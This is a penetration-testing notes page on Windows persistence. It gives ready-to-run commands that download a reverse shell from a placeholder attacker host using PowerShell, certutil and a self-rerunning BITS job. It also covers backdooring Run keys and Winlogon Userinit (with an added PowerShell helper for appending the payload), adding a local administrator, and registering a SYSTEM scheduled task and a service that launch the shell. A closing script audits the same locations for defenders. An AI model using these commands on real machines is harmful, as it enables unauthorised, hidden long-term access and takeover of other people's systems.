killchain-compendium/persistence/persistence.md

Persistence

  • Gained through
    • Startup folder persistence
    • Editing registry keys (Run keys, Winlogon)
    • Scheduled tasks
    • SUID binaries (Linux)
    • BITS jobs
    • Creating a backdoored service
    • Creating a user
    • RDP

Gain Persistence on Windows

  • Browser: add the attacker host to Trusted Sites if zone policy or SmartScreen blocks the download.
  • PowerShell
Invoke-WebRequest http://<attacker-IP>:<attacker-Port>/shell.exe -OutFile .\shell2.exe
  • DOS prompt (certutil as a download cradle; the last argument is the output file)
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe shell2.exe
  • On the attacker, use exploit/multi/handler with PAYLOAD windows/meterpreter/reverse_tcp and set LHOST and LPORT to the same values the payload was built with.

Paths to Persistence

  • Put the binary in the user's startup directory (runs at every interactive logon of that user, no admin needed)
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Put the reverse shell into %APPDATA% and add an HKCU Run key (also per-user, no admin needed; HKLM\...\Run does the same for all users but needs admin)
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" /f

Background Intelligence Transfer Service (BITS)

bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetNotifyCmdLine __shell__ cmd.exe "/c bitsadmin /complete __shell__ && start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay __shell__ 30
bitsadmin /resume __shell__

  • Every bitsadmin switch after /create takes the job name as its first argument. /SetNotifyCmdLine runs the given program when the transfer finishes; the downloaded file is only written to its final name after /complete, so the notify command has to call /complete itself before starting the payload.
  • The job survives reboots and keeps retrying (every 30 s here) until the download succeeds, which is what makes this a persistence mechanism rather than just a download cradle.
  • Check with: bitsadmin /list /allusers /verbose

High Priv

  • Create a user: net user <user> <pass> /add
  • Add it to the local administrators group: net localgroup Administrators <user> /add
  • Check: net localgroup Administrators

Add to registry

  • Execute on every interactive logon via the Winlogon Userinit value (HKLM, so needs admin). The value is a comma-separated list that Winlogon runs in order; keep the real userinit.exe entry first and append the payload, otherwise nobody can log on any more:
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\yadda\shell2.exe," /f
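The reg add above overwrites whatever is already in Userinit. As an added example (not part of the original notes), here is a PowerShell version that reads the current value, refuses to touch it if userinit.exe is missing from the list, appends the payload only if it is not already there, and can undo the change. Must be run elevated; the payload path `C:\yadda\shell2.exe` in the usage comment is the same placeholder the notes use.

```powershell
# Added example, not from the original page: append a payload to the Winlogon
# Userinit value without clobbering the existing entries. Run elevated.

$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-UserinitEntries {
    # Userinit is "path1,path2," - split on commas and drop the empty tail entry
    $current = (Get-ItemProperty -Path $WinlogonKey -Name Userinit).Userinit
    return @($current -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
}

function Add-UserinitEntry {
    param([Parameter(Mandatory)] [string] $PayloadPath)

    $entries = Get-UserinitEntries

    # Refuse to write a value that no longer runs the real userinit.exe:
    # that breaks every interactive logon on the box.
    if (-not ($entries | Where-Object { $_ -match 'userinit\.exe$' })) {
        throw "Userinit value '$($entries -join ',')' does not contain userinit.exe; not modifying it"
    }
    if ($entries -contains $PayloadPath) {
        return ($entries -join ',') + ','      # already persisted, nothing to do
    }

    $entries += $PayloadPath
    $new = ($entries -join ',') + ','          # Windows keeps a trailing comma
    Set-ItemProperty -Path $WinlogonKey -Name Userinit -Value $new -Type String
    return $new
}

function Remove-UserinitEntry {
    param([Parameter(Mandatory)] [string] $PayloadPath)

    $entries = Get-UserinitEntries | Where-Object { $_ -ne $PayloadPath }
    $new = ($entries -join ',') + ','
    Set-ItemProperty -Path $WinlogonKey -Name Userinit -Value $new -Type String
    return $new
}

# Usage (placeholder path from the notes):
# Add-UserinitEntry    -PayloadPath 'C:\yadda\shell2.exe'
# Get-UserinitEntries                     # verify
# Remove-UserinitEntry -PayloadPath 'C:\yadda\shell2.exe'   # cleanup after the engagement
```

The check for userinit.exe is the important part: a typo in the value, or a tool that writes only the payload path, leaves the machine unable to complete a logon until someone fixes the key offline.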

Add a Service

  • Inside meterpreter run load powershell, then powershell_shell for an interactive PowerShell (needs admin or SYSTEM to create a service). Use StartupType Automatic: Boot and System start types are for kernel drivers and are rejected for a user-mode service.
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType Automatic
Start-Service -Name "<SERVICE_NAME>"
  • A plain reverse shell exe does not talk the service control protocol, so the SCM reports error 1053 and kills it after the start timeout; migrate to another process or have the binary spawn the shell as a child before that happens.

Add Scheduled Task

  • Registering a task that runs as SYSTEM needs admin. The task below fires at any user's logon:
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Administrator\Documents\rshell.exe"
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask -TaskName ReverseShell -InputObject $E
  • Check: Get-ScheduledTask -TaskName ReverseShell | Get-ScheduledTaskInfo
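Whichever of the paths above is used, you want to confirm the implant actually landed, and the defender on the other side wants to find it. As an added example that is not part of the original notes, the following PowerShell enumerates every persistence location this page describes: Run/RunOnce keys, both Startup folders, Winlogon Userinit/Shell, services whose binary lives outside C:\Windows, SYSTEM tasks with a logon trigger, BITS jobs that carry a notification command line, and local Administrators membership. Run it elevated so HKLM, all-user BITS jobs and the service list are visible. The location list and the "outside C:\Windows" heuristic are my choices, not something the notes specify, and the service filter is deliberately noisy (legitimate Program Files services show up too).

```powershell
# Added example, not from the original page: audit the persistence locations
# covered in these notes. Run elevated. Property names are those exposed by the
# ScheduledTasks, BitsTransfer and LocalAccounts modules on Windows PowerShell 5.1.

function Get-PersistenceArtifacts {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Source, $Name, $Value) {
        $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Value = $Value })
    }

    # 1. Run / RunOnce keys, per-user and machine-wide
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $runKeys) {
        if (Test-Path $key) {
            $props = Get-ItemProperty -Path $key
            foreach ($p in $props.PSObject.Properties) {
                if ($p.Name -notmatch '^PS') { Add-Finding $key $p.Name $p.Value }   # skip provider metadata
            }
        }
    }

    # 2. Startup folders (current user and all users)
    foreach ($dir in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
        Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue |
            ForEach-Object { Add-Finding 'StartupFolder' $_.Name $_.FullName }
    }

    # 3. Winlogon Userinit / Shell: the defaults hold exactly one entry each,
    #    so anything beyond that has been appended
    $wl = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    foreach ($name in 'Userinit', 'Shell') {
        $entries = @($wl.$name -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
        if ($entries.Count -gt 1) { Add-Finding 'Winlogon' $name $wl.$name }
    }

    # 4. Services whose binary is not under C:\Windows (heuristic, expect noise)
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"?[A-Z]:\\Windows\\'
    } | ForEach-Object { Add-Finding 'Service' $_.Name "$($_.StartMode): $($_.PathName)" }

    # 5. Scheduled tasks running as SYSTEM from a logon trigger
    Get-ScheduledTask | Where-Object {
        $_.Principal.UserId -match 'SYSTEM' -and
        ($_.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
    } | ForEach-Object {
        $cmd = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName)" $cmd
    }

    # 6. BITS jobs that run a command on completion (the bitsadmin /SetNotifyCmdLine trick)
    Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue |
        Where-Object { $_.NotifyCmdLine } |
        ForEach-Object { Add-Finding 'BITS' $_.DisplayName ($_.NotifyCmdLine -join ' ') }

    # 7. Who is in the local Administrators group
    Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'LocalAdmins' $_.Name $_.ObjectClass }

    return $findings
}

Get-PersistenceArtifacts | Format-Table -AutoSize -Wrap
```

Run it once before planting anything to get a baseline, then again afterwards; the diff is exactly the set of artifacts you have to clean up at the end of the engagement, and the same diff is what a host-based detection would alert on.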